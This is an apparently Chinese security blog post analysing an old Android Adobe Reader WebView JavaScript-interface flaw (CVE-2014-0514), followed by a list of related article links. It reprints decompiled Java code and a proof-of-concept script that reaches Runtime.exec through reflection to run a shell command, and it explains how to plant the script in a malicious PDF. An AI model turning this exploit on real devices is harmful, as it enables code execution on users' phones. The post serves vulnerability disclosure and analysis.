Android Adobe Reader 任意程式碼執行分析(附POC)
0x00 描述
前幾天老外在fd還有exploit-db上,公佈了Adobe Reader任意程式碼執行的漏洞。
漏洞編號: CVE: 2014-0514
AdobeReader安裝量比較大,又和瀏覽器容器不同,分析一下。
Android Adobe Reader 呼叫webview的不安全的Javascript interfaces。
導致可以執行任意js程式碼。具體檢視WebView中介面隱患與手機掛馬利用。
影響版本:
理論上Android Adobe Reader 11.2.0之前的版本多存在,Android version 11.1.3成功利用。
我檢視了之前的幾個版本例如Android Adobe Reader 11.1.2 如下圖,問題也應該存在。
0x01利用
從反編譯出來的java程式碼看
#!java
public class ARJavaScript
{
[...]
public ARJavaScript(ARViewerActivity paramARViewerActivity)
{
[...]
this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");
this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");
this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");
this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");
this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
}
_adobereader,_app,_doc,_escriptString,_event,_field這幾個變數都會存在任意程式碼執行的問題.
利用程式碼和之前一樣。
#!java
function execute(bridge, cmd) {
return bridge.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
if(window._app) {
try {
var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);
window._app.alert(path + ' created', 3);
} catch(e) {
window._app.alert(e, 0);
}
}
這裡不同是構造 惡意的PDF。
首先需要一個PDF編輯器,比如Adobe Acrobat(flash達人pz推薦).
然後新增表單按鈕或者書籤等,呼叫事件新增
我這裡看了下button最好演示,和老外的那個poc一樣基本上.
匯入到android虛擬機器裡,開啟,成功復現。
0x02 擴充套件
一些網盤或瀏覽器,看看能否呼叫adobe reader來預覽pdf的應用可能會存在這個漏洞,大部分應用都是直接下載pdf到本地。可以再測試一些能預覽pdf的郵箱之類的應用。
0x03 修復
新版本的Adobe Reader 11.2.0 [email protected]tInterface,老版本的使用者則在adobereader禁用了表單的js執行。 不知道那些防毒軟體能不能檢測到這些惡意poc呢 :)
附上poc.pdf
相關文章
- Django任意程式碼執行漏洞分析Django
- VMwareMac版本漏洞可任意執行惡意程式碼REMMac
- iOS Jailbreak Principles - Undecimus 分析(三)通過 IOTrap 實現核心任意程式碼執行iOSAI
- IE 5.5 Index.dat 執行任意程式碼漏洞 (轉)Index
- 懸鏡安全丨Java 反序列化任意程式碼執行漏洞分析與利用Java
- GitHub漏洞允許任意程式碼執行,Windows不受影響GithubWindows
- Firefox,Chrome中的高危漏洞允許執行任意程式碼FirefoxChrome
- 流行 VPN 包含允許執行任意程式碼的安全漏洞
- 烽火狼煙丨Apache Commons Text 任意程式碼執行漏洞Apache
- BlueBorne遠端程式碼執行漏洞Poc實戰(CVE-2017-0781)
- 如何讓指令碼在任意地方可執行指令碼
- 利用 Python 特性在 Jinja2 模板中執行任意程式碼Python
- Acer和華碩電腦漏洞曝光,可導致任意程式碼執行
- Adobe reader multiple languages pack
- Adobe Acrobat Reader 下載BAT
- [poc] hw情報-泛微 e-cology v10 遠端程式碼執行漏洞
- Joomla遠端程式碼執行漏洞分析OOM
- 程式碼效能分析-Dottrace跟蹤程式碼執行時間
- 修復Apache Log4j任意程式碼執行漏洞安全風險通告Apache
- Git 爆任意程式碼執行漏洞,所有使用者都受影響Git
- Adobe Reader 不再支援 LinuxLinux
- Android 原始碼分析(三)安卓中的執行緒Android原始碼安卓執行緒
- Facades 原理 (程式碼執行流程分析)
- 執行緒池的實現程式碼分析執行緒
- 行業分析| 快對講Poc方案的優勢行業
- 程式碼執行
- [原創]Adobe reader 漏洞CVE-2009-4324初步分析
- Discuz! X系列遠端程式碼執行漏洞分析
- 執行流程原始碼分析原始碼
- 執行任意位置的 PHP 檔案PHP
- Adobe Acrobat Reader也能用書籤了BAT
- 乾貨|CVE-2019-11043: PHP-FPM在Nginx特定配置下任意程式碼執行漏洞分析PHPNginx
- Java多執行緒-程式執行堆疊分析Java執行緒
- android程式和執行緒Android執行緒
- Android程式與執行緒Android執行緒
- Android 程式和執行緒Android執行緒
- 從簡單程式碼入手,分析執行緒池原理執行緒
- Android程式框架:執行緒與執行緒池Android框架執行緒